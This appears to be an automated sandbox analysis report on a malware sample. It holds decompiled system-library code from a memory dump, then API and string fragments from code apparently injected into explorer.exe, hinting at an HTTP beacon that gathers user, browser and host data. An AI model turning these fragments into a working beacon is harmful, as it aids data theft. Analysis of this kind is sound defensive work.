                                                            			E00A26A60(intOrPtr* _a4) {
                                                            				signed int _v8;
                                                            				char _v24;
                                                            				signed char _v25;
                                                            				intOrPtr* _v32;
                                                            				signed char _v36;
                                                            				signed int _v40;
                                                            				intOrPtr* _v44;
                                                            				char _v48;
                                                            				intOrPtr _v52;
                                                            				char _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr* _v68;
                                                            				signed char _v72;
                                                            				signed char _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				signed char _v88;
                                                            				signed int _v92;
                                                            				signed char _v96;
                                                            				char _v100;
                                                            				signed int _v104;
                                                            				void* _v116;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t101;
                                                            				void* _t105;
                                                            				signed int _t112;
                                                            				signed int* _t113;
                                                            				signed int* _t114;
                                                            				intOrPtr _t117;
                                                            				intOrPtr _t118;
                                                            				void* _t122;
                                                            				signed int _t127;
                                                            				intOrPtr* _t128;
                                                            				signed int _t131;
                                                            				signed char _t134;
                                                            				signed int _t136;
                                                            				intOrPtr* _t138;
                                                            				intOrPtr* _t139;
                                                            				intOrPtr _t143;
                                                            				signed char _t144;
                                                            				signed short _t145;
                                                            				signed char _t146;
                                                            				intOrPtr* _t147;
                                                            				intOrPtr _t148;
                                                            				void* _t150;
                                                            				char _t152;
                                                            				signed int _t153;
                                                            				signed char _t154;
                                                            
                                                            				_v8 =  *0xaed360 ^ _t153;
                                                            				_t144 =  *0x7ffe03c6;
                                                            				_v25 = _t144;
                                                            				_t128 = _a4;
                                                            				_v44 = _t128;
                                                            				if((_t144 & 0x00000001) == 0) {
                                                            					L54:
                                                            					_push(0);
                                                            					_push( &_v100);
                                                            					E00A39810();
                                                            					 *_t128 = _v100;
                                                            					 *(_t128 + 4) = _v96;
                                                            					goto L20;
                                                            				} else {
                                                            					do {
                                                            						_t148 =  *0x7ffe03b8;
                                                            						_t134 =  *0x7FFE03BC;
                                                            						_t146 =  *0x7FFE03BC;
                                                            						_v60 = _t148;
                                                            						_v76 = _t134;
                                                            					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
                                                            					_t128 = _v44;
                                                            					if((_t144 & 0x00000002) != 0) {
                                                            						_t147 =  *0xae6908; // 0x0
                                                            						_v68 = _t147;
                                                            						if(_t147 == 0) {
                                                            							goto L54;
                                                            						} else {
                                                            							goto L22;
                                                            						}
                                                            						while(1) {
                                                            							L22:
                                                            							_t101 =  *_t147;
                                                            							_v32 = _t101;
                                                            							if(_t101 == 0) {
                                                            								break;
                                                            							}
                                                            							if(_t144 >= 0) {
                                                            								if((_t144 & 0x00000020) == 0) {
                                                            									if((_t144 & 0x00000010) != 0) {
                                                            										asm("mfence");
                                                            									}
                                                            								} else {
                                                            									asm("lfence");
                                                            								}
                                                            								asm("rdtsc");
                                                            							} else {
                                                            								asm("rdtscp");
                                                            								_v72 = _t134;
                                                            							}
                                                            							_v52 = _t101;
                                                            							_v84 =  *((intOrPtr*)(_t147 + 8));
                                                            							_v64 =  *((intOrPtr*)(_t147 + 0x10));
                                                            							_v80 =  *((intOrPtr*)(_t147 + 0x14));
                                                            							_t105 = E00A3CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                            							_t146 = _t144;
                                                            							E00A3CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                            							_t150 = _t105 + _t144;
                                                            							_t144 = _v25;
                                                            							asm("adc edi, 0x0");
                                                            							_v40 = _t150 + _v64;
                                                            							_t147 = _v68;
                                                            							asm("adc edi, [ebp-0x4c]");
                                                            							_v36 = _t146;
                                                            							if( *_t147 != _v32) {
                                                            								continue;
                                                            							} else {
                                                            								_t128 = _v44;
                                                            								_t147 = _v60;
                                                            								L19:
                                                            								_t144 = _v36;
                                                            								asm("adc edx, [ebp-0x48]");
                                                            								 *_t128 = E00A3D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
                                                            								 *(_t128 + 4) = _t144;
                                                            								L20:
                                                            								return E00A3B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
                                                            							}
                                                            						}
                                                            						_t128 = _v44;
                                                            						goto L54;
                                                            					}
                                                            					_v56 = 0xffffffff;
                                                            					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
                                                            						_t136 = 0x14c;
                                                            						L14:
                                                            						_t112 = _t136 & 0x0000ffff;
                                                            						L15:
                                                            						if(_t112 == 0xaa64) {
                                                            							_t113 =  &_v40;
                                                            							_v32 = _t113;
                                                            							_t138 = _v32;
                                                            							asm("int 0x81");
                                                            							 *_t138 = _t113;
                                                            							 *(_t138 + 4) = _t144;
                                                            							if((_t144 & 0x00000040) == 0) {
                                                            								goto L19;
                                                            							}
                                                            							_t114 =  &_v92;
                                                            							_v32 = _t114;
                                                            							_t139 = _v32;
                                                            							asm("int 0x81");
                                                            							 *_t139 = _t114;
                                                            							 *(_t139 + 4) = _t144;
                                                            							_t144 = _v88;
                                                            							if(((_t144 ^ _v36) & 0x00000001) != 0) {
                                                            								goto L19;
                                                            							}
                                                            							_t112 = _v92;
                                                            							L18:
                                                            							_v40 = _t112;
                                                            							_v36 = _t144;
                                                            							goto L19;
                                                            						}
                                                            						if(_t144 >= 0) {
                                                            							if((_t144 & 0x00000020) == 0) {
                                                            								if((_t144 & 0x00000010) != 0) {
                                                            									asm("mfence");
                                                            								}
                                                            							} else {
                                                            								asm("lfence");
                                                            							}
                                                            							asm("rdtsc");
                                                            						} else {
                                                            							asm("rdtscp");
                                                            						}
                                                            						goto L18;
                                                            					}
                                                            					_t117 =  *[fs:0x18];
                                                            					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
                                                            					if(_t143 < 0) {
                                                            						_t117 = _t117 + _t143;
                                                            					}
                                                            					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
                                                            						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
                                                            					} else {
                                                            						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
                                                            					}
                                                            					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
                                                            						L34:
                                                            						_v48 = 0x10;
                                                            						_push( &_v48);
                                                            						_push(0x10);
                                                            						_t146 =  &_v24;
                                                            						_push(_t146);
                                                            						_push(4);
                                                            						_push( &_v56);
                                                            						_push(0xb5);
                                                            						_t122 = E00A3AA90();
                                                            						if(_t122 == 0xc0000023) {
                                                            							_t152 = _v48;
                                                            							E00A3D000(_t152);
                                                            							_t146 = _t154;
                                                            							_push( &_v48);
                                                            							_push(_t152);
                                                            							_push(_t146);
                                                            							_push(4);
                                                            							_push( &_v56);
                                                            							_push(0xb5);
                                                            							_t122 = E00A3AA90();
                                                            							_t147 = _v60;
                                                            						}
                                                            						if(_t122 < 0) {
                                                            							_t112 = _v104;
                                                            							_t144 = _v25;
                                                            							goto L15;
                                                            						} else {
                                                            							_t145 =  *_t146;
                                                            							_t136 = 0;
                                                            							if(_t145 == 0) {
                                                            								L43:
                                                            								_t144 = _v25;
                                                            								goto L14;
                                                            							}
                                                            							_t131 = 0;
                                                            							do {
                                                            								if((_t145 & 0x00040000) != 0) {
                                                            									_t136 = _t145 & 0x0000ffff;
                                                            								}
                                                            								_t145 =  *(_t146 + 4 + _t131 * 4);
                                                            								_t131 = _t131 + 1;
                                                            							} while (_t145 != 0);
                                                            							_t128 = _v44;
                                                            							goto L43;
                                                            						}
                                                            					} else {
                                                            						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
                                                            						if(_t127 == 0) {
                                                            							goto L34;
                                                            						}
                                                            						_t136 = _t127;
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            			}
                                                            0x00a67f34
                                                            0x00a67f37
                                                            0x00a67f3c
                                                            0x00000000
                                                            0x00a67f3e
                                                            0x00a67f3e
                                                            0x00a67f41
                                                            0x00a26b35
                                                            0x00a26b38
                                                            0x00a26b44
                                                            0x00a26b4c
                                                            0x00a26b4e
                                                            0x00a26b51
                                                            0x00a26b69
                                                            0x00a26b69
                                                            0x00a67f3c
                                                            0x00a68046
                                                            0x00000000
                                                            0x00a68046
                                                            0x00a26abc
                                                            0x00a26aca
                                                            0x00a67f49
                                                            0x00a26b13
                                                            0x00a26b13
                                                            0x00a26b16
                                                            0x00a26b1e
                                                            0x00a67fe7
                                                            0x00a67fea
                                                            0x00a67fed
                                                            0x00a67ff0
                                                            0x00a67ff2
                                                            0x00a67ff4
                                                            0x00a67ffa
                                                            0x00000000
                                                            0x00000000
                                                            0x00a68000
                                                            0x00a68003
                                                            0x00a68006
                                                            0x00a68009
                                                            0x00a6800b
                                                            0x00a6800d
                                                            0x00a68010
                                                            0x00a6801f
                                                            0x00000000
                                                            0x00000000
                                                            0x00a68025
                                                            0x00a26b2f
                                                            0x00a26b2f
                                                            0x00a26b32
                                                            0x00000000
                                                            0x00a26b32
                                                            0x00a26b26
                                                            0x00a68030
                                                            0x00a6803a
                                                            0x00a6803c
                                                            0x00a6803c
                                                            0x00a68032
                                                            0x00a68032
                                                            0x00a68032
                                                            0x00a6803f
                                                            0x00a26b2c
                                                            0x00a26b2c
                                                            0x00a26b2c
                                                            0x00000000
                                                            0x00a26b26
                                                            0x00a26ad0
                                                            0x00a26ad6
                                                            0x00a26ade
                                                            0x00a26ae0
                                                            0x00a26ae0
                                                            0x00a26ae5
                                                            0x00a67f53
                                                            0x00a26aeb
                                                            0x00a26aeb
                                                            0x00a26aeb
                                                            0x00a26af3
                                                            0x00a67f5e
                                                            0x00a67f61
                                                            0x00a67f68
                                                            0x00a67f69
                                                            0x00a67f6b
                                                            0x00a67f70
                                                            0x00a67f71
                                                            0x00a67f76
                                                            0x00a67f77
                                                            0x00a67f7c
                                                            0x00a67f86
                                                            0x00a67f88
                                                            0x00a67f8d
                                                            0x00a67f92
                                                            0x00a67f97
                                                            0x00a67f98
                                                            0x00a67f99
                                                            0x00a67f9a
                                                            0x00a67f9f
                                                            0x00a67fa0
                                                            0x00a67fa5
                                                            0x00a67faa
                                                            0x00a67faa
                                                            0x00a67faf
                                                            0x00a67fdc
                                                            0x00a67fdf
                                                            0x00000000
                                                            0x00a67fb1
                                                            0x00a67fb1
                                                            0x00a67fb3
                                                            0x00a67fb8
                                                            0x00a67fd4
                                                            0x00a67fd4
                                                            0x00000000
                                                            0x00a67fd4
                                                            0x00a67fba
                                                            0x00a67fbc
                                                            0x00a67fc2
                                                            0x00a67fc4
                                                            0x00a67fc4
                                                            0x00a67fc7
                                                            0x00a67fcb
                                                            0x00a67fcc
                                                            0x00a67fd1
                                                            0x00000000
                                                            0x00a67fd1
                                                            0x00a26b04
                                                            0x00a26b04
                                                            0x00a26b0b
                                                            0x00000000
                                                            0x00000000
                                                            0x00a26b11
                                                            0x00000000
                                                            0x00a26b11
                                                            0x00a26af3

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77c0ddbc9d4f2a3d2a4524eb17455db149e1379c6b634ee0366abcb911787d10
                                                            • Instruction ID: 5df363bfa2e72a39f0171e92060cf6b7cf1572b16d2dc38da16dcfbb512693f7
                                                            • Opcode Fuzzy Hash: 77c0ddbc9d4f2a3d2a4524eb17455db149e1379c6b634ee0366abcb911787d10
                                                            • Instruction Fuzzy Hash: D2815A71E01229DFDB24CF98C981BEEBBB5EF08354F148069E945EB281D735AD05CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16e8a920fad6b5eda3d2f88ad2d32bf4cfbaa4bf923c0e66a1e6fd14d6e47b4c
                                                            • Instruction ID: 0b13b395201cdf5bd91d2a05f22798cdf27c0851ca0406f5953b342991ef05ac
                                                            • Opcode Fuzzy Hash: 16e8a920fad6b5eda3d2f88ad2d32bf4cfbaa4bf923c0e66a1e6fd14d6e47b4c
                                                            • Instruction Fuzzy Hash: 5590026530100402D242616944546060009D7D1385F91C022E1414595D86658953F172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58a8ecfc0cd46d3db0127fcbbce840d90b2be95e3db71c919eaef885d81f4c12
                                                            • Instruction ID: 62e92110489a14913f2351391e12109e8fc55dec0e3208a079e99935e2d925a1
                                                            • Opcode Fuzzy Hash: 58a8ecfc0cd46d3db0127fcbbce840d90b2be95e3db71c919eaef885d81f4c12
                                                            • Instruction Fuzzy Hash: 6390027534100402D281716944446060009A7D0381F91C022A0414594E86958A56FAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cbd9622c2b5d52c22aafb257b172b6f11610efc462580472ad67dbeccb18858
                                                            • Instruction ID: 496b9890b1531fdcc842476d2593b25ce7ac08528d0f0ddf09689988ccfe635f
                                                            • Opcode Fuzzy Hash: 4cbd9622c2b5d52c22aafb257b172b6f11610efc462580472ad67dbeccb18858
                                                            • Instruction Fuzzy Hash: 8D9002A5701140434680B16948444065015A7E1341391C131A04445A0C86A88855E2A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 107a5b1d3511c0a82f196021f444a1354c05cbaca30510f2ebd8f0843c6d17fb
                                                            • Instruction ID: adbf2bef3e4705d69d95c54574bdef2552c8662c3597c14e498482c554cfeaf9
                                                            • Opcode Fuzzy Hash: 107a5b1d3511c0a82f196021f444a1354c05cbaca30510f2ebd8f0843c6d17fb
                                                            • Instruction Fuzzy Hash: 349002A531100042D24461694444706004597E1341F51C022A2144594CC5698C61A165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 039c539fd119558a76ebd7506ad3990fe2eae0f293faee4187cb0caaced24b57
                                                            • Instruction ID: a2b104b94d9160774cf3132984c2b982a9310a160bd42aa155c31c3af8f33c2a
                                                            • Opcode Fuzzy Hash: 039c539fd119558a76ebd7506ad3990fe2eae0f293faee4187cb0caaced24b57
                                                            • Instruction Fuzzy Hash: EA9002A530140403D28065694844607000597D0342F51C021A2054595E8A698C51B175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0f33373cca3e0cdc8fb9098bc33cd5513dba18b68b99e2a1c01c1f676f854b3
                                                            • Instruction ID: f2fd822791b6a01ae21b6ab442b06185d810bf162d4e56d9469bb2d0192dad71
                                                            • Opcode Fuzzy Hash: e0f33373cca3e0cdc8fb9098bc33cd5513dba18b68b99e2a1c01c1f676f854b3
                                                            • Instruction Fuzzy Hash: 1C90026530144442D28062694844B0F410597E1342F91C029A4146594CC9558855A761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99aecfa6c5031749b943f0518642f659bde2d6b50977f3aab02d58d34f1fd479
                                                            • Instruction ID: 25159b2f1e3f93a711d37580008ae5727f58341129f5fff04a2ddd65b72ccfcf
                                                            • Opcode Fuzzy Hash: 99aecfa6c5031749b943f0518642f659bde2d6b50977f3aab02d58d34f1fd479
                                                            • Instruction Fuzzy Hash: BC90027530140402D24061694848747000597D0342F51C021A5154595E86A5C891B571
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac5749bab94b8e8dc3efd648bce76a87a3196a041d9fd1d2f28ca8f9f7c407e4
                                                            • Instruction ID: 306fdddda10b7708a754be9709a80c5b1f5fdd6195a96ef02a1ff9a34215d0fa
                                                            • Opcode Fuzzy Hash: ac5749bab94b8e8dc3efd648bce76a87a3196a041d9fd1d2f28ca8f9f7c407e4
                                                            • Instruction Fuzzy Hash: 1C90027530144002D2807169848460B5005A7E0341F51C421E0415594C86558856E261
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85c59540935ae9d81cf45e5a5af5e96553f7b2443d76db0f55b00f16d769e7c0
                                                            • Instruction ID: d03eaf5341150d8741fa6097fe9defc73e5e10fbd0e7fac6561da8ac93da2caa
                                                            • Opcode Fuzzy Hash: 85c59540935ae9d81cf45e5a5af5e96553f7b2443d76db0f55b00f16d769e7c0
                                                            • Instruction Fuzzy Hash: 1990026534100802D280716984547070006D7D0741F51C021A0014594D86568965B6F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd5cc551b25faa3c504f4e063594da92046f066f839804d29fa7f27eb6b819bf
                                                            • Instruction ID: fc1adcfa7173c1a240be350bd47f53873d31af1834b1481d2ab55bcc3c1aa000
                                                            • Opcode Fuzzy Hash: dd5cc551b25faa3c504f4e063594da92046f066f839804d29fa7f27eb6b819bf
                                                            • Instruction Fuzzy Hash: F490027530100802D24461694844686000597D0341F51C021A6014695E96A58891B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6a249fbd7035bdeb2ad8ce87bdc2cee82f229bf18a3b174cfca6439f49b540
                                                            • Instruction ID: a460ede559557fdc4233c232f432dfdbddec85d9f0ef50ea82a86f4dbe1db7bd
                                                            • Opcode Fuzzy Hash: 2a6a249fbd7035bdeb2ad8ce87bdc2cee82f229bf18a3b174cfca6439f49b540
                                                            • Instruction Fuzzy Hash: 3C9002E5301140924640A2698444B0A450597E0341B51C026E10445A0CC5658851E175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3669433d1a87a3503b2937fb735787f479cdd3172092d33fa53877b69c2032f
                                                            • Instruction ID: a97aeefbf91e4c9ebb952dec13acd1b8966c4f45d095d645ea3b29a1e546a3f4
                                                            • Opcode Fuzzy Hash: f3669433d1a87a3503b2937fb735787f479cdd3172092d33fa53877b69c2032f
                                                            • Instruction Fuzzy Hash: 3F900275B05000129280716948546464006A7E0781B55C021A0504594C89948A55A3E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E00A8FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                            				void* _t7;
                                                            				intOrPtr _t9;
                                                            				intOrPtr _t10;
                                                            				intOrPtr* _t12;
                                                            				intOrPtr* _t13;
                                                            				intOrPtr _t14;
                                                            				intOrPtr* _t15;
                                                            
                                                            				_t13 = __edx;
                                                            				_push(_a4);
                                                            				_t14 =  *[fs:0x18];
                                                            				_t15 = _t12;
                                                            				_t7 = E00A3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                            				_push(_t13);
                                                            				E00A85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                            				_t9 =  *_t15;
                                                            				if(_t9 == 0xffffffff) {
                                                            					_t10 = 0;
                                                            				} else {
                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                            				}
                                                            				_push(_t10);
                                                            				_push(_t15);
                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                            				return E00A85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                            			}











                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A8FDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A8FE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A8FE01
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: d9ba31fddcc686f249622c3180501812b81d4d66558515592a7e10b1b9890266
                                                            • Instruction ID: 3abf52243d4c6e49ce00e09f1b107d0deed4032f8231c4589ff249e88806b6eb
                                                            • Opcode Fuzzy Hash: d9ba31fddcc686f249622c3180501812b81d4d66558515592a7e10b1b9890266
                                                            • Instruction Fuzzy Hash: EAF0F632600641BFDA212B56DD02F23BB6AEB84730F244315F668565E1DA62FC6097F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:6.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:13.8%
                                                            Total number of Nodes:94
                                                            Total number of Limit Nodes:10

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: recv$Sleepgetaddrinfosetsockopt
                                                            • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                            • API String ID: 878647675-2045366144
                                                            • Opcode ID: 919ada85d6d5f5293ae2865f33b49d2841302952dd8815af8d0eab5be181b76c
                                                            • Instruction ID: 2328d3d755f3c0b51e66ec47bef4d1cda535fefc7f71eb37c6eff5b9dd79fb73
                                                            • Opcode Fuzzy Hash: 919ada85d6d5f5293ae2865f33b49d2841302952dd8815af8d0eab5be181b76c
                                                            • Instruction Fuzzy Hash: 87529330618B088FCB29EF28D485AEEB3E1FB98704F54562DE49BC7246DF34A546CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • ObtainUserAgentString.URLMON ref: 0B735549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: AgentObtainStringUser
                                                            • String ID: -Age$User$nt: $on.d$urlm
                                                            • API String ID: 2681117516-1987325725
                                                            • Opcode ID: 8e6d898b0d8aa8bf5b1cfee9b365fe9ba51cf3aa0ae9aac90c25f02f1de6fda5
                                                            • Instruction ID: f872188a3c7811bdbe293c87fc6ea08af5bac1698478d189e7ea8319ddcd2a8b
                                                            • Opcode Fuzzy Hash: 8e6d898b0d8aa8bf5b1cfee9b365fe9ba51cf3aa0ae9aac90c25f02f1de6fda5
                                                            • Instruction Fuzzy Hash: 9C31F131B14A4C8FCF44EFA8C8893EDB7E1FB58605F40422AE44EE7341EE7896498785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 215 b737072-b7370a8 216 b7370d2-b7370f5 connect 215->216 217 b7370aa-b7370cc call b739ea2 215->217 217->216
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: connect
                                                            • String ID: conn$ect
                                                            • API String ID: 1959786783-716201944
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 220 b737068-b7370a8 221 b7370d2-b7370f5 connect 220->221 222 b7370aa-b7370cc call b739ea2 220->222 222->221
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: connect
                                                            • String ID: conn$ect
                                                            • API String ID: 1959786783-716201944
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 225 b736f62-b736f9b 226 b736fc5-b736fe0 WSAStartup 225->226 227 b736f9d-b736fbf call b739ea2 225->227 227->226
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: WSAS$tart
                                                            • API String ID: 724789610-2426239465
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
